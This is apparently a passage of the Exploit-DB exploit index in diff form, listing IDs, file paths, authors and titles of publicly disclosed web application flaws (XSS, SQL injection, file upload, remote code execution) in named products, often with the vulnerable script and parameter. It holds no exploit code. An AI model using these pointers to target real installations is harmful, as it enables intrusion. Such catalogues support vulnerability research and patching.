+34405,exploits/php/webapps/34405.txt,"PHP Stock Management System 1.02 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-08-25,"Ragha Deepthi K R",webapps,php, +34408,exploits/multiple/webapps/34408.txt,"Innovaphone PBX Admin-GUI - Cross-Site Request Forgery",2014-08-25,"Rainer Giedat",webapps,multiple,80 +34409,exploits/multiple/webapps/34409.rb,"ManageEngine Password Manager - MetadataServlet.dat SQL Injection (Metasploit)",2014-08-25,"Pedro Ribeiro",webapps,multiple,8020 +34410,exploits/php/webapps/34410.txt,"PHPFinance 0.6 - '/group.php' SQL Injection / HTML Injection",2010-08-05,skskilL,webapps,php, +34411,exploits/asp/webapps/34411.txt,"DT Centrepiece 4.5 - Cross-Site Scripting / Security Bypass",2010-08-05,"High-Tech Bridge SA",webapps,asp, +34412,exploits/php/webapps/34412.txt,"Hulihan Applications BXR 0.6.8 - SQL Injection / HTML Injection",2010-08-05,"High-Tech Bridge SA",webapps,php, +34413,exploits/php/webapps/34413.txt,"DiamondList - '/user/main/update_settings?setting[site_title]' Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",webapps,php, +34414,exploits/php/webapps/34414.txt,"DiamondList - '/user/main/update_category?category[description]' Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",webapps,php, +34415,exploits/php/webapps/34415.txt,"Hulihan Applications Amethyst 0.1.5 - Multiple HTML Injection Vulnerabilities",2010-08-05,"High-Tech Bridge SA",webapps,php, +34416,exploits/php/webapps/34416.txt,"Muraus Open Blog - Multiple HTML Injection Vulnerabilities",2010-08-05,"High-Tech Bridge SA",webapps,php, +34417,exploits/php/webapps/34417.txt,"Prado Portal 1.2 - 'page' Cross-Site Scripting",2010-08-06,"High-Tech Bridge SA",webapps,php, +34418,exploits/php/webapps/34418.txt,"Dataface 1.0 - 'admin.php' Cross-Site Scripting",2010-08-06,MustLive,webapps,php, +34419,exploits/multiple/webapps/34419.txt,"ntopng 1.2.0 - Cross-Site Scripting Injection",2014-08-26,"Steffen Bauch",webapps,multiple, +34420,exploits/cgi/webapps/34420.txt,"VTLS Virtua InfoStation.cgi - SQL Injection",2014-08-26,"José Tozo",webapps,cgi,80 +34526,exploits/php/webapps/34526.pl,"vBulletin 4.0.x < 4.1.2 - 'search.php?cat' SQL Injection",2014-09-03,D35m0nd142,webapps,php,80 +34424,exploits/php/webapps/34424.txt,"WordPress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities",2014-08-27,"Mike Manzotti",webapps,php, +34429,exploits/asp/webapps/34429.txt,"Allinta CMS 22.07.2010 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-09,"High-Tech Bridge SA",webapps,asp, +34430,exploits/php/webapps/34430.txt,"Preation Eden Platform 27.7.2010 - Multiple HTML Injection Vulnerabilities",2010-08-09,"High-Tech Bridge SA",webapps,php, +34432,exploits/php/webapps/34432.txt,"Wowd - 'index.html' Multiple Cross-Site Scripting Vulnerabilities",2009-10-29,Lostmon,webapps,php, +34433,exploits/php/webapps/34433.txt,"Simple Directory Listing 2.1 - 'SDL2.php' Cross-Site Scripting",2010-10-22,"Amol Naik",webapps,php, +34456,exploits/php/webapps/34456.txt,"JBoard - Multiple Cross-Site Scripting / SQL Injections",2009-08-31,Inj3ct0r,webapps,php, +34436,exploits/php/webapps/34436.txt,"WordPress Plugin ShortCode 0.2.3 - Local File Inclusion",2014-08-28,"Mehdi Karout & Christian Galeone",webapps,php, +34438,exploits/php/webapps/34438.txt,"MybbCentral TagCloud 2.0 - 'Topic' HTML Injection",2010-08-11,3ethicalhackers.com,webapps,php, +34440,exploits/jsp/webapps/34440.txt,"Computer Associates Oneview Monitor 6.0 - 'doSave.jsp' Remote Code Execution",2010-08-12,"Giorgio Fedon",webapps,jsp, +34441,exploits/php/webapps/34441.txt,"JForum 2.08 - BBCode Color Tag HTML Injection",2010-05-13,"Giorgio Fedon",webapps,php, +34443,exploits/php/webapps/34443.txt,"PaoLink 1.0 - 'scrivi.php' Cross-Site Scripting",2009-09-16,Moudi,webapps,php, +34444,exploits/php/webapps/34444.txt,"RSSMediaScript - 'index.php' Cross-Site Scripting",2009-09-16,Moudi,webapps,php, +34445,exploits/php/webapps/34445.txt,"LiveStreet 0.2 - Comment Topic Header Cross-Site Scripting",2009-08-31,Inj3ct0r,webapps,php, +34446,exploits/php/webapps/34446.txt,"LiveStreet 0.2 - '/include/ajax/blogInfo.php?asd' Cross-Site Scripting",2009-08-31,Inj3ct0r,webapps,php, +34447,exploits/php/webapps/34447.py,"Plogger 1.0-RC1 - Authenticated Arbitrary File Upload",2014-08-28,b0z,webapps,php,80 +34449,exploits/multiple/webapps/34449.txt,"ManageEngine DeviceExpert 5.9 - User Credential Disclosure",2014-08-28,"Pedro Ribeiro",webapps,multiple, +34450,exploits/php/webapps/34450.py,"ActualAnalyzer Lite 2.81 - Unauthenticated Command Execution",2014-08-28,"Benjamin Harris",webapps,php,80 +34451,exploits/php/webapps/34451.py,"PhpWiki - Remote Command Execution",2014-08-28,"Benjamin Harris",webapps,php,80 +34452,exploits/php/webapps/34452.py,"XRms - Blind SQL Injection / Command Execution",2014-08-28,"Benjamin Harris",webapps,php,80 +34453,exploits/php/webapps/34453.txt,"PaoBacheca 2.1 - 'index.php' URI Cross-Site Scripting",2009-09-16,Moudi,webapps,php, +34454,exploits/php/webapps/34454.txt,"PaoBacheca 2.1 - 'scrivi.php' URI Cross-Site Scripting",2009-09-16,Moudi,webapps,php, +34455,exploits/php/webapps/34455.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injections (2)",2010-08-12,Affix,webapps,php, +34459,exploits/php/webapps/34459.txt,"Amiro.CMS 5.4 - Multiple Input Validation Vulnerabilities",2009-10-19,"Vladimir Vorontsov",webapps,php, +34464,exploits/php/webapps/34464.txt,"SyntaxCMS - 'rows_per_page' SQL Injection",2010-08-10,"High-Tech Bridge SA",webapps,php, +34467,exploits/php/webapps/34467.txt,"Edit-X PHP CMS - 'search_text' Cross-Site Scripting",2010-08-13,"High-Tech Bridge SA",webapps,php, +34468,exploits/php/webapps/34468.html,"Mystic 0.1.4 - Multiple Cross-Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",webapps,php, +34469,exploits/php/webapps/34469.html,"Onyx - Multiple Cross-Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",webapps,php, +34470,exploits/php/webapps/34470.txt,"Beex - 'news.php?navaction' Cross-Site Scripting",2009-09-01,Moudi,webapps,php, +34471,exploits/php/webapps/34471.txt,"Beex - 'partneralle.php?navaction' Cross-Site Scripting",2009-09-01,Moudi,webapps,php, +34472,exploits/php/webapps/34472.txt,"PHPMass Real Estate - 'view_map.php' Cross-Site Scripting",2009-09-01,Moudi,webapps,php, +34473,exploits/php/webapps/34473.txt,"Property Watch - 'email.php?videoid' Cross-Site Scripting",2009-09-01,Moudi,webapps,php, +34474,exploits/php/webapps/34474.txt,"Property Watch - 'login.php?redirect' Cross-Site Scripting",2009-09-01,Moudi,webapps,php, +34475,exploits/php/webapps/34475.txt,"Joomla! Component Weblinks - 'Itemid' SQL Injection",2010-08-15,"ViRuS Qalaa",webapps,php, +34476,exploits/php/webapps/34476.txt,"Zomplog 3.9 - 'message' Cross-Site Scripting",2010-08-15,10n1z3d,webapps,php, +34477,exploits/php/webapps/34477.txt,"Joomla! Component com_fireboard - 'Itemid' SQL Injection",2010-08-15,"ViRuS Qalaa",webapps,php, +34479,exploits/php/webapps/34479.html,"CMSimple 3.3 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-16,"High-Tech Bridge SA",webapps,php, +34481,exploits/php/webapps/34481.txt,"123 Flash Chat - Multiple Vulnerabilities",2010-08-16,Lincoln,webapps,php, +34482,exploits/php/webapps/34482.txt,"TurnkeyForms Yahoo Answers Clone - 'questiondetail.php' Cross-Site Scripting",2009-08-10,Moudi,webapps,php, +34483,exploits/php/webapps/34483.txt,"Nasim Guest Book - 'page' Cross-Site Scripting",2010-08-10,Moudi,webapps,php, +34484,exploits/php/webapps/34484.txt,"Joomla! Component com_dirfrm - Multiple SQL Injections",2010-08-18,Hieuneo,webapps,php, +34485,exploits/php/webapps/34485.txt,"FreeSchool - 'key_words' Cross-Site Scripting",2009-10-14,"drunken danish rednecks",webapps,php, +34486,exploits/php/webapps/34486.txt,"phpCMS 2008 - 'download.php' Information Disclosure",2009-10-19,Securitylab.ir,webapps,php, +34487,exploits/php/webapps/34487.txt,"Facil Helpdesk - 'kbase/kbase.php' URI Cross-Site Scripting",2009-08-07,Moudi,webapps,php, +34492,exploits/asp/webapps/34492.txt,"Online Work Order Suite Lite Edition - Multiple Cross-Site Scripting Vulnerabilities",2009-08-10,Moudi,webapps,asp, +34493,exploits/php/webapps/34493.txt,"Payment Processor Script (PPScript) - 'shop.htm' SQL Injection",2009-08-03,MizoZ,webapps,php, +34494,exploits/php/webapps/34494.txt,"ViArt Helpdesk - 'products.php?category_id' Cross-Site Scripting",2009-08-10,Moudi,webapps,php, +34495,exploits/php/webapps/34495.txt,"ViArt Helpdesk - 'article.php?category_id' Cross-Site Scripting",2009-08-10,Moudi,webapps,php, +34496,exploits/php/webapps/34496.txt,"ViArt Helpdesk - 'product_details.php?category_id' Cross-Site Scripting",2009-08-10,Moudi,webapps,php, +34501,exploits/php/webapps/34501.txt,"Hitron Soft Answer Me - 'answers.php' Cross-Site Scripting",2009-08-10,Moudi,webapps,php, +34503,exploits/php/webapps/34503.txt,"Syntax Highlighter 3.0.83 - 'index.html' HTML Injection",2010-08-19,indoushka,webapps,php, +34504,exploits/php/webapps/34504.txt,"Cacti 0.8.7 (RedHat High Performance Computing [HPC]) - 'utilities.php?Filter' Cross-Site Scripting",2010-08-19,"Marc Schoenefeld",webapps,php, +34508,exploits/php/webapps/34508.txt,"AneCMS 1.0/1.3 - 'register/next' SQL Injection",2010-08-23,Sweet,webapps,php, +34511,exploits/php/webapps/34511.txt,"Mulitple WordPress Themes - 'admin-ajax.php?img' Arbitrary File Download",2014-09-01,"Hugo Santiago",webapps,php,80 +34513,exploits/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Persistent Cross-Site Scripting",2014-09-01,"Prakhar Prasad",webapps,multiple, +34514,exploits/php/webapps/34514.txt,"WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload",2014-09-01,"Jesus Ramirez Pichardo",webapps,php,80 +34518,exploits/jsp/webapps/34518.txt,"ManageEngine DesktopCentral - Arbitrary File Upload / Remote Code Execution",2014-09-01,"Pedro Ribeiro",webapps,jsp, +34519,exploits/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities",2014-09-01,"Hans-Martin Muench",webapps,jsp,8400 +34524,exploits/php/webapps/34524.txt,"WordPress Plugin Huge-IT Image Gallery 1.0.1 - Authenticated SQL Injection",2014-09-02,"Claudio Viviani",webapps,php,80 +34525,exploits/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python)",2014-09-02,"Dolev Farhi",webapps,multiple, +34637,exploits/php/webapps/34637.txt,"Joomla! Component com_formmaker 3.4 - SQL Injection",2014-09-12,"Claudio Viviani",webapps,php, +34684,exploits/php/webapps/34684.pl,"Joomla! Component com_spain - 'nv' SQL Injection",2010-09-20,FL0RiX,webapps,php, +34531,exploits/php/webapps/34531.txt,"BlastChat Client 3.3 - Cross-Site Scripting",2010-08-25,"Aung Khant",webapps,php, +34533,exploits/php/webapps/34533.txt,"Auto CMS 1.6 - 'autocms.php' Cross-Site Scripting",2010-08-23,"High-Tech Bridge SA",webapps,php, +34534,exploits/php/webapps/34534.txt,"TCMS - Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",webapps,php, +34535,exploits/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 - Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",webapps,php, +34536,exploits/php/webapps/34536.txt,"CompuCMS - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",webapps,php, +34538,exploits/php/webapps/34538.txt,"WordPress Plugin Premium Gallery Manager - Unauthenticated Configuration Access",2014-09-05,Hannaichi,webapps,php,80 +34539,exploits/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Persistent Cross-Site Scripting",2014-09-05,"Fikri Fadzil",webapps,php,80 +34541,exploits/php/webapps/34541.txt,"WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection",2010-08-29,MiND,webapps,php, +34543,exploits/php/webapps/34543.txt,"HP Insight Diagnostics Online Edition 8.4 - 'parameters.php?device' Cross-Site Scripting",2010-08-31,"Mr Teatime",webapps,php, +34544,exploits/php/webapps/34544.txt,"HP Insight Diagnostics Online Edition 8.4 - 'idstatusframe.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-31,"Mr Teatime",webapps,php, +34545,exploits/php/webapps/34545.txt,"HP Insight Diagnostics Online Edition 8.4 - 'survey.php?category' Cross-Site Scripting",2010-08-31,"Mr Teatime",webapps,php, +34546,exploits/php/webapps/34546.txt,"HP Insight Diagnostics Online Edition 8.4 - 'globals.php?tabpage' Cross-Site Scripting",2010-08-31,"Mr Teatime",webapps,php, +34547,exploits/php/webapps/34547.txt,"HP Insight Diagnostics Online Edition 8.4 - 'custom.php?testmode' Cross-Site Scripting",2010-08-31,"Mr Teatime",webapps,php, +34548,exploits/php/webapps/34548.txt,"Datemill - 'photo_view.php?return' Cross-Site Scripting",2009-09-10,Moudi,webapps,php, +34549,exploits/php/webapps/34549.txt,"Datemill - 'photo_search.php?st' Cross-Site Scripting",2009-09-10,Moudi,webapps,php, +34550,exploits/php/webapps/34550.txt,"Datemill - 'search.php?st' Cross-Site Scripting",2009-09-10,Moudi,webapps,php, +34551,exploits/php/webapps/34551.txt,"IP Board 3.x - Cross-Site Request Forgery / Token Hjiacking",2014-09-07,"Piotr S.",webapps,php, +34552,exploits/php/webapps/34552.txt,"LoadedCommerce7 - Systemic Query Factory",2014-09-07,Breaking.Technology,webapps,php, +34553,exploits/php/webapps/34553.txt,"WordPress Plugin Like Dislike Counter 1.2.3 - SQL Injection",2014-09-07,Att4ck3r.ir,webapps,php, +34555,exploits/php/webapps/34555.txt,"PhpOnlineChat 3.0 - Cross-Site Scripting",2014-09-07,"N0 Feel",webapps,php, +34604,exploits/php/webapps/34604.php,"BlueCMS 1.6 - 'x-forwarded-for' Header SQL Injection",2010-09-06,cnryan,webapps,php, +34558,exploits/php/webapps/34558.txt,"Amiro.CMS 5.8.4.0 - Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",webapps,php, +34559,exploits/php/webapps/34559.txt,"Rumba XML 2.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",webapps,php, +34560,exploits/php/webapps/34560.html,"ArtGK CMS - Cross-Site Scripting / HTML Injection",2010-09-01,"High-Tech Bridge SA",webapps,php, +34561,exploits/php/webapps/34561.txt,"KingCMS 0.6 - 'CONFIG[AdminPath]' Remote File Inclusion",2009-09-07,Securitylab.ir,webapps,php, +34562,exploits/php/webapps/34562.txt,"AdaptBB 1.0 - 'q' Cross-Site Scripting",2009-10-14,"drunken danish rednecks",webapps,php, +34563,exploits/php/webapps/34563.txt,"OneCMS 2.6.1 - 'index.php' Cross-Site Scripting",2010-09-02,anT!-Tr0J4n,webapps,php, +34564,exploits/php/webapps/34564.txt,"CMS WebManager-Pro - 'c.php' SQL Injection",2010-09-02,MustLive,webapps,php, +34565,exploits/php/webapps/34565.txt,"NuSOAP 0.9.5 - 'nusoap.php' Cross-Site Scripting",2010-09-03,"Bogdan Calin",webapps,php, +34578,exploits/php/webapps/34578.txt,"WordPress Theme Acento - 'view-pdf.php?File' Arbitrary File Download",2014-09-08,alieye,webapps,php,80 +34581,exploits/php/webapps/34581.txt,"Zen Cart 1.5.3 - Multiple Vulnerabilities",2014-09-08,smash,webapps,php,80 +34571,exploits/php/webapps/34571.py,"Joomla! Component Spider Calendar 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",webapps,php, +34572,exploits/php/webapps/34572.txt,"WordPress Plugin Bulk Delete Users by Email 1.0 - Cross-Site Request Forgery",2014-09-08,"Fikri Fadzil",webapps,php, +34580,exploits/php/webapps/34580.txt,"phpMyFAQ 2.8.x - Multiple Vulnerabilities",2014-09-08,smash,webapps,php,80 +34579,exploits/php/webapps/34579.txt,"vBulletin 5.1.x - Persistent Cross-Site Scripting",2014-09-08,smash,webapps,php,80 +34924,exploits/windows/webapps/34924.txt,"BMC Track-It! - Multiple Vulnerabilities",2014-10-09,"Pedro Ribeiro",webapps,windows, +34582,exploits/php/webapps/34582.txt,"osCommerce 2.3.4 - Multiple Vulnerabilities",2014-09-08,smash,webapps,php,80 +34583,exploits/hardware/webapps/34583.txt,"TP-Link TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,webapps,hardware,80 +34584,exploits/hardware/webapps/34584.txt,"TP-Link TL-WR841N / TL-WR841ND - Multiple Vulnerabilities",2014-09-08,smash,webapps,hardware,80 +34585,exploits/php/webapps/34585.txt,"Atmail Webmail 7.2 - Multiple Vulnerabilities",2014-09-08,smash,webapps,php,443 +34586,exploits/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,"Eldar Marcussen",webapps,php,80 +34587,exploits/multiple/webapps/34587.txt,"Jenkins 1.578 - Multiple Vulnerabilities",2014-09-08,JoeV,webapps,multiple,8090 +34589,exploits/php/webapps/34589.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 2.0 - Multiple Vulnerabilities",2014-09-09,"Fikri Fadzil",webapps,php, +34593,exploits/php/webapps/34593.txt,"Parallels Plesk Sitebuilder 9.5 - Multiple Vulnerabilities",2014-09-09,alieye,webapps,php, +34596,exploits/php/webapps/34596.txt,"Pligg CMS 1.0.4 - SQL Injection / Cross-Site Scripting",2010-09-03,"Bogdan Calin",webapps,php, +34597,exploits/php/webapps/34597.txt,"Datetopia Buy Dating Site - Cross-Site Scripting",2010-09-10,Moudi,webapps,php, +34598,exploits/php/webapps/34598.txt,"SZNews 2.7 - 'printnews.php3' Remote File Inclusion",2009-09-11,"kurdish hackers team",webapps,php, +34599,exploits/php/webapps/34599.txt,"tourismscripts HotelBook - 'hotel_id' Multiple SQL Injections",2009-09-10,Mr.SQL,webapps,php, +34600,exploits/php/webapps/34600.txt,"Match Agency BiZ - 'edit_profile.php?important' Cross-Site Scripting",2009-09-11,Moudi,webapps,php, +34601,exploits/php/webapps/34601.txt,"Match Agency BiZ - 'report.php?pid' Cross-Site Scripting",2009-09-11,Moudi,webapps,php, +34605,exploits/php/webapps/34605.txt,"Horde Application Framework 3.3.8 - 'icon_browser.php' Cross-Site Scripting",2010-09-06,"Moritz Naumann",webapps,php, +34606,exploits/php/webapps/34606.txt,"Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting",2009-09-02,Moudi,webapps,php, +34607,exploits/php/webapps/34607.txt,"TBDev 2.0 - Remote File Inclusion / SQL Injection",2010-09-02,Inj3ct0r,webapps,php, +34608,exploits/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Inclusion",2010-09-06,"MiND C0re",webapps,php, +34609,exploits/php/webapps/34609.txt,"MySource Matrix - 'char_map.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",webapps,php, +34610,exploits/php/webapps/34610.txt,"ZenPhoto 1.3 - '/zp-core/full-image.php?a' SQL Injection",2010-09-07,"Bogdan Calin",webapps,php, +34611,exploits/php/webapps/34611.txt,"ZenPhoto 1.3 - '/zp-core/admin.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-07,"Bogdan Calin",webapps,php, +34805,exploits/php/webapps/34805.txt,"StatsCode - Multiple Cross-Site Scripting Vulnerabilities",2009-07-09,"599eme Man",webapps,php, +34806,exploits/php/webapps/34806.txt,"JNM Guestbook 3.0 - 'index.php' Cross-Site Scripting",2009-07-09,Moudi,webapps,php, +34807,exploits/php/webapps/34807.txt,"JNM Solutions DB Top Sites 1.0 - 'vote.php' Cross-Site Scripting",2009-07-08,Moudi,webapps,php, +34808,exploits/php/webapps/34808.txt,"Rapidsendit Clone Script - 'admin.php' Insecure Cookie Authentication Bypass",2009-07-08,NoGe,webapps,php, +34614,exploits/asp/webapps/34614.txt,"SmarterTools SmarterStats 5.3.3819 - 'frmHelp.aspx' Cross-Site Scripting",2010-09-09,"David Hoyt",webapps,asp, +34683,exploits/php/webapps/34683.txt,"e-soft24 Article Directory Script - 'q' Cross-Site Scripting",2009-08-30,"599eme Man",webapps,php, +34616,exploits/php/webapps/34616.txt,"Elkagroup Elkapax - 'q' Cross-Site Scripting",2009-08-13,Isfahan,webapps,php, +34617,exploits/php/webapps/34617.txt,"Waverider Systems Perlshop - Multiple Input Validation Vulnerabilities",2009-08-06,Shadow,webapps,php, +34618,exploits/php/webapps/34618.txt,"Omnistar Recruiting - 'resume_register.php' Cross-Site Scripting",2009-09-06,MizoZ,webapps,php, +34619,exploits/php/webapps/34619.txt,"PaysiteReviewCMS 1.1 - 'search.php' Cross-Site Scripting",2010-09-14,"Valentin Hoebel",webapps,php, +34620,exploits/php/webapps/34620.txt,"PaysiteReviewCMS - 'image.php' Cross-Site Scripting",2010-09-14,"Valentin Hoebel",webapps,php, +34751,exploits/hardware/webapps/34751.pl,"ZYXEL Prestig P-660HNU-T1 - ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",webapps,hardware,80 +34624,exploits/php/webapps/34624.txt,"OroCRM - Persistent Cross-Site Scripting",2014-09-11,Provensec,webapps,php,80 +34625,exploits/php/webapps/34625.py,"Joomla! Component Spider Contacts 1.3.6 - 'contacts_id' SQL Injection",2014-09-11,"Claudio Viviani",webapps,php,80 +34626,exploits/ios/webapps/34626.txt,"Photorange 1.0 iOS - Local File Inclusion",2014-09-11,Vulnerability-Lab,webapps,ios,9900 +34627,exploits/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent Cross-Site Scripting",2014-09-11,Vulnerability-Lab,webapps,ios, +34628,exploits/php/webapps/34628.txt,"Santafox 2.0.2 - 'search' Cross-Site Scripting",2010-09-06,"High-Tech Bridge SA",webapps,php, +34629,exploits/php/webapps/34629.txt,"AContent 1.0 - Cross-Site Scripting / HTML Injection",2010-09-15,"High-Tech Bridge SA",webapps,php, +34630,exploits/php/webapps/34630.txt,"AChecker 1.0 - 'URI' Cross-Site Scripting",2010-09-15,"High-Tech Bridge SA",webapps,php, +34631,exploits/php/webapps/34631.txt,"ATutor 1.0 - Multiple 'cid' Cross-Site Scripting Vulnerabilities",2010-09-15,"High-Tech Bridge SA",webapps,php, +34632,exploits/php/webapps/34632.txt,"Multi Website 1.5 - 'search' HTML Injection",2009-08-06,"599eme Man",webapps,php, +34633,exploits/php/webapps/34633.txt,"SpiceWorks - 'query' Cross-Site Scripting",2009-08-08,"Adam Baldwin",webapps,php, +34634,exploits/php/webapps/34634.txt,"Multple I-Escorts Products - 'escorts_search.php' Cross-Site Scripting",2010-09-15,"599eme Man",webapps,php, +34635,exploits/php/webapps/34635.txt,"Willscript Auction Website Script - 'category.php' SQL Injection",2009-08-06,"599eme Man",webapps,php, +34636,exploits/php/webapps/34636.txt,"NWS-Classifieds - 'cmd' Local File Inclusion",2010-09-15,"John Leitch",webapps,php, +34639,exploits/php/webapps/34639.txt,"CMScout IBrowser TinyMCE Plugin 2.3.4.3 - Local File Inclusion",2010-09-15,"John Leitch",webapps,php, +34640,exploits/php/webapps/34640.txt,"Mollify 1.6 - 'index.php' Cross-Site Scripting",2010-09-15,"John Leitch",webapps,php, +34641,exploits/php/webapps/34641.py,"ChillyCMS 2.3.4.3 - Arbitrary File Upload",2010-09-15,"John Leitch",webapps,php, +34642,exploits/php/webapps/34642.txt,"AJ Auction Pro OOPD 3.0 - 'txtkeyword' Cross-Site Scripting",2009-08-06,"599eme Man",webapps,php, +34643,exploits/php/webapps/34643.txt,"Silurus Classifieds - 'category.php?ID' Cross-Site Scripting",2009-08-06,Moudi,webapps,php, +34644,exploits/php/webapps/34644.txt,"Silurus Classifieds - 'wcategory.php?ID' Cross-Site Scripting",2009-08-06,Moudi,webapps,php, +34645,exploits/php/webapps/34645.txt,"Silurus Classifieds - 'search.php?keywords' Cross-Site Scripting",2009-08-06,Moudi,webapps,php, +34646,exploits/php/webapps/34646.txt,"Blog Ink (Blink) - Multiple SQL Injections",2009-08-03,Drosophila,webapps,php, +34649,exploits/php/webapps/34649.txt,"Netautor Professional 5.5 - 'login2.php' Cross-Site Scripting",2010-09-17,"Gjoko Krstic",webapps,php, +34650,exploits/php/webapps/34650.txt,"e-Soft24 Flash Games Script 1.0 - Cross-Site Scripting",2009-08-30,"599eme Man",webapps,php, +34651,exploits/php/webapps/34651.txt,"e-Soft24 Jokes Portal Script Seo 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2009-08-30,"599eme Man",webapps,php, +34652,exploits/php/webapps/34652.txt,"e-Soft24 PTC Script 1.2 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2009-08-30,"599eme Man",webapps,php, +34653,exploits/php/webapps/34653.txt,"e107 0.7.23 - Multiple SQL Injections",2010-09-17,"High-Tech Bridge SA",webapps,php, +34655,exploits/php/webapps/34655.txt,"Open Classifieds - Multiple Cross-Site Scripting Vulnerabilities",2009-08-28,Moudi,webapps,php, +34656,exploits/php/webapps/34656.txt,"x10 MP3 Automatic Search Engine 1.6.5 - '/includes/video_ad.php?pic_id' Cross-Site Scripting",2009-08-29,Moudi,webapps,php, +34657,exploits/php/webapps/34657.txt,"x10 MP3 Automatic Search Engine 1.6.5 - 'linkvideos_listing.php?category' Cross-Site Scripting",2009-08-29,Moudi,webapps,php, +34658,exploits/php/webapps/34658.txt,"x10 MP3 Automatic Search Engine 1.6.5b - '/templates/header1.php?id' Cross-Site Scripting",2009-08-29,Moudi,webapps,php, +34659,exploits/php/webapps/34659.txt,"x10 MP3 Automatic Search Engine 1.6.5b - 'video_listing.php?key' Cross-Site Scripting",2009-08-29,Moudi,webapps,php, +34660,exploits/php/webapps/34660.txt,"x10 MP3 Automatic Search Engine 1.6.5b - 'embed.php?name' Cross-Site Scripting",2009-08-29,Moudi,webapps,php, +34661,exploits/php/webapps/34661.txt,"x10 MP3 Automatic Search Engine 1.6.5b - 'info.php?name' Cross-Site Scripting",2009-08-29,Moudi,webapps,php, +34662,exploits/php/webapps/34662.txt,"x10 MP3 Automatic Search Engine 1.6.5b - 'lyrics.php?id' Cross-Site Scripting",2009-08-29,Moudi,webapps,php, +34663,exploits/php/webapps/34663.txt,"x10 MP3 Automatic Search Engine 1.6.5b - '/adult/video_listing.php?key' Cross-Site Scripting",2009-08-29,Moudi,webapps,php, +34664,exploits/ios/webapps/34664.txt,"Briefcase 4.0 iOS - Code Execution / File Inclusion",2014-09-15,Vulnerability-Lab,webapps,ios, +34666,exploits/php/webapps/34666.py,"ALCASAR 2.8.1 - Remote Code Execution",2014-09-15,eF,webapps,php,80 +34672,exploits/linux/webapps/34672.txt,"CacheGuard-OS 5.7.7 - Cross-Site Request Forgery",2014-09-15,"William Costa",webapps,linux,8090 +34673,exploits/php/webapps/34673.txt,"Tukanas Classifieds 1.0 - 'index.php' SQL Injection",2009-08-28,Moudi,webapps,php, +34674,exploits/php/webapps/34674.txt,"WebStatCaffe - '/stat/mostvisitpage.php?nodayshow' Cross-Site Scripting",2009-08-29,Moudi,webapps,php, +34675,exploits/php/webapps/34675.txt,"WebStatCaffe - '/stat/visitorduration.php?nodayshow' Cross-Site Scripting",2009-08-29,Moudi,webapps,php, +34676,exploits/php/webapps/34676.txt,"WebStatCaffe - '/stat/mostvisitpagechart.php?nopagesmost' Cross-Site Scripting",2009-08-29,Moudi,webapps,php, +34677,exploits/php/webapps/34677.txt,"WebStatCaffe - '/stat/pageviewers.php?date' Cross-Site Scripting",2009-08-29,Moudi,webapps,php, +34678,exploits/php/webapps/34678.txt,"WebStatCaffe - '/stat/pageviewerschart.php?date' Cross-Site Scripting",2009-08-29,Moudi,webapps,php, +34679,exploits/php/webapps/34679.txt,"WebStatCaffe - '/stat/referer.php?date' Cross-Site Scripting",2009-08-29,Moudi,webapps,php, +34680,exploits/hardware/webapps/34680.txt,"ZTE ZXDSL-931VII - Unauthenticated Configuration Dump",2014-09-16,"L0ukanik0-s S0kniaku0l",webapps,hardware, +34681,exploits/php/webapps/34681.txt,"WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload (Python)",2014-09-16,"Claudio Viviani",webapps,php, +34682,exploits/ios/webapps/34682.txt,"USB&WiFi Flash Drive 1.3 iOS - Code Execution",2014-09-16,Vulnerability-Lab,webapps,ios,8080 +34687,exploits/asp/webapps/34687.txt,"Smart ASP Survey - 'catid' SQL Injection",2009-08-27,Moudi,webapps,asp, +34688,exploits/php/webapps/34688.txt,"Basilic 1.5.13 - 'index.php' Cross-Site Scripting",2009-07-27,PLATEN,webapps,php, +34689,exploits/php/webapps/34689.txt,"Smart Magician Blog 1.0 - Multiple SQL Injections",2009-08-27,Evil-Cod3r,webapps,php, +34690,exploits/php/webapps/34690.txt,"@Mail 6.1.9 - 'MailType' Cross-Site Scripting",2010-09-21,"Vicente Aguilera Diaz",webapps,php, +34692,exploits/php/webapps/34692.txt,"WebAsyst Shop-Script PREMIUM - 'SearchString' Cross-Site Scripting",2009-07-27,u.f.,webapps,php, +34693,exploits/php/webapps/34693.txt,"Free Arcade Script 1.0 - 'search' Cross-Site Scripting",2009-08-27,"599eme 